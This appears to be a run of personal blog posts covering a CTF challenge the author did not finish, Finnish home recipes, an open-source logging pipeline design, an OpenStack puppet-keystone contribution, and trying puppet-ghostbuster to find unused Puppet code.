Wow you made it all this way? Prepare for a bit of downer! :)
In the end I ran out of time. End of new year approached and some busy times in January 2020! Turned out I got quite far with a python script, but had too many good IPs in my list I think. In the end I used a JQ solution found in a writeup that is available in the google cache, initially found by searching for the numbers used for the srand function in the elfscrow challenge.
Miksata kerma, tomaatimurska ja mausteet. Kaada sose formille jossa on jo tortellinia ja tomaatia. fetajuusto päällä. Uunille 200 ℃ ~18min.
Versiolle kaksille: ehkä parempi rikottajuusto, penaati ja ilman tomaatimurska?
Ota pakasti lohta pakastimesta.
Laita kaikki kahteen kattilaan. Joka painee noin 800g. Vesimäärä tarvitset on ‘niin paljon että se menee yli ruoan’. Keitä ruoka.
Kun se in valmis laita 400g lohta yhteen kattilaan ja 400g kanaa toiseen.
Kahdelle
3dl vettä ja 3dl maitoa. Vispata ja kun höyry tulee ottaa lämmöt allas. Laitta 4x 3/4dl (12/4 vai 3dl) hiutaleita (esim kaurasta tai neljänviljasta) skuupat. Kun on melkein valmis lämmöt pois ja lautta suola.
Laittaa puuron kulhoihin, laitta voita keskellä ja silloin sokeria.
Tadaa :)
Is there an open source thing out there I could use??
So if I only want to use mostly free and open source it there’s a bunch of tools one need to glue together:
These days I’d like to for primary ingestion have a BGP ECMP/anycast for rsyslog receivers. These also run logstash (or beat?). Or maybe one can have a load balancer up front which redirects traffic based on incoming port (and maybe a syslog tag for some ‘authentication’ ? ) to a set of logparsing/rsyslog servers.
These would write to a Kafka cluster.
Then we would need more readers to stream events on to elastic, siems or Hadoop or for example longer term storage engines.
For the as a Service bit I’d like to play with Rundeck and have users configure most of the bits themselves. Logstash grokking/parsing though needs outsourcing too. Fewer rules means more throughput so would be good with different logstash processes for different logs. Could like loggly direct users to ship logs with a tag to get them into the correct lane.
For reading just grafana and kibana should be a good start.
Croutons : Uniin päällä. Laitta pakastettuna leipä mikroaaltouuniin ja lämmitävät. Leikkaa ja laitaa uunilevylle. Miksata öljyllä ja valkosipulilla. Odottaa.
Majoneesi : 1dl rypsiöljy. Yhden kanamuna (ei rikkitää) ja vähän sinappi. Käytää sauvamixeri(sauvasekoitin on oikea sana) . Laitta pieni kulhoon ja lisätä valkosipulii ja suola.
Salaatti: pieni tomaattia, salaatti, yksi avokaado, 400g kanaafilee vaan suolattu. Paistaa kanaa viimeistä ja kun se on valmis laitta croutonit uuniin muutama minuuttia.
Tarjota parmeggiano pöydällä.
Tadaa :)
Kahdelle
Ohjeet: Hakata yhden keltainen sipuli. Laita kattilaan öljyllä. Miksata turkalainen jogurtti ja kaksi avokadoa. Suolata runsaasti ja vähän mustapippuria. Laitta vesi päällä spaghetille.
Avokado sipulille. Rakastaa puoli parmeggiano levy ja laitta melkein kaikki kattilaan. Ylimäärä pöydälle.
Puristaa puoli sitruuna kattilaan. Kun on lämmin se on valmis. Viimeistä Spaghetti kattilaan. Tsekkaa jos lisää suola ja pippuri on tarvetavissa.
Kahdelle
Osat:
Ohjeet :
Laitta uunin päällä 250C astetta. Feta levy uuniformille, tomaattia ympäri sen. Hakkaa chilli ja laitta juuston päällä. Paljon öljy yli kaikki. Suolata ja pipurita :) 25min uunissa.
Kun vesi on 100C laitta suola ja sen jälkeen spaghettin.
Kun tomaattia on rikki ota formmi uunista ja miksata feta ja chilli. Laitta kaikki yhdessä.
Bon App!
How to rotate??
Ainesosit:
Ohjeet:
Laita mustikoita laatikkoon ja odottaa noin tunti. Sen jälkeen laitta kaikki muut ainesosit laatikkoon ja miksata. Huomata että mustikoita eivät menevät liian rikki kuin haluat. Sulje laatiko ja laitta jääkaapiin yli yö.
Nautista aamulla!
Recently I had the pleasure of contributing upstream to the OpenStack project!
A link to my merged patches: https://review.opendev.org/#/q/owner:+guldmyr+status:merged
In a previous OpenStack summit (these days called OpenInfra Summits), (Vancouver 2018) I went there a few days early and attended the Upstream Institute https://docs.openstack.org/upstream-training/ .
It was 1.5 days long or so if I remember right. Looking up my notes from that these were the highlights:
Even though my patches were one baby and a bit over 1 year in time after the Upstream Institute I could still figure things out quite quickly with the help of the guides and get bugs created and patches submitted. My general plan when first attending it wasn’t to contribute code changes, but rather to start reading code, perhaps find open bugs and so on.
The thing I wanted to change in puppet-keystone was apparently also possible to change in many other puppet-* modules, and less than a day after my puppet-keystone change got merged into master someone else picked up the torch and made PRs to like ~15 other repositories with similar changes :) Pretty cool!
Testing is hard! https://review.opendev.org/#/c/669045/1 is one backport I created for puppet-keystone/rocky, and the Ubuntu testing was not working initially (started with an APT mirror issue and later it was slow and timed out)… After 20 rechecks and two weeks, it still hadn’t successfully passed a test. In the end we got there though with the help of a core reviewer that actually updated some mirror and later disabled some tests :)
Now the change itself was about “oslo_middleware/max_request_body_size” So that we can increase it from the default 114688. The Pouta Cloud had issues where our Federation User Mappings were larger than 114688 bytes and we coudln’t update them anymore, turns out they were blocked by oslo_middleware.
(does anybody know where 114688bytes comes from? Some internal speculation has been that it is from 128kilobytes minus some headers)
Anyway, the mapping we have now is simplified just a long [ list ] of “local_username”: “federation_email”, domain: “default”. I think next step might be to try to figure out if maybe we can make the rules using something like below instead of hardcoding the values into the rules
"name": "{0}"
It’s been quite hard to find examples that are exactly like our use-case (and playing about with is not a priority right now, just something in the backlog, but could be interesting to look at when we start accepting more federations).
All in all, I’m really happy to have gotten to contribute something to the OpenStack ecosystem!
We use puppet at $dayjob to configure OpenStack.
I wanted to know if there’s a lot of unused code in our manifests!
**From left of stage enters: https://github.com/camptocamp/puppet-ghostbuster **
Step one is to install the puppet modules and gems and whatnot, this blog post was good about that: https://codingbee.net/puppet/puppet-identifying-dead-puppet-code-using-puppet-ghostbuster
Next I needed to get the HTTP forwarding of the puppetdb working, this can apparently (I learnt about ssh -J) be done with:
ssh -J jumphost.example.org INTERNALIPOFPUPPETMASTER -L 8081:localhost:8080
Then for setting some variables pointing to hiera.yaml and setting
PUPPETDB_URL=http://localhost:8081
HIERA_YAML=/tmp/hiera.yaml
Unsure if hiera.yaml works, just copied it in from the puppetmaster
Then running it
find . -type f -name ‘*.pp’ -exec puppet-lint –only-checks ghostbuster_classes,ghostbuster_defines,ghostbuster_facts,ghostbuster_files,ghostbuster_functions,ghostbuster_hiera_files,ghostbuster_templates,ghostbuster_types {} \+|grep OURMODULE
Got some output! Are they correct?
./modules/OURMODULE/manifests/profile/apache.pp – WARNING: Class OURMODULE::Profile::Apache seems unused on line 6
But actually we have a role that contains:
class { ‘OURMODULE::profile::apache’: }
So I’m not sure what is up… But if I don’t run all the ghostbuster and instead skip the ghostbuster_classes test I get a lot fewer warnings for our module.
/modules/OURMODULE/manifests/profile/keystone/user.pp – WARNING: Define OURMODULE::Profile::Keystone::User seems unused on line 2
Looking in that one we have a “OURMODULE::profile::keystone::user” which calls keystone_user and keystone_user_role. However we do call it but like this:
OURMODULE::Profile::Keystone::User<| title == ‘barbican’ |>
Or in this other place:
create_resources(OURMODULE::profile::keystone::user, $users)
Let’s look at the next. which was also a “create_resources” . Meh. Same same. And if I skip the ghostbuster_defines? No errors :) Well it was worth a shot. Some googling on the topic hints that it might not be possible with the way puppet works.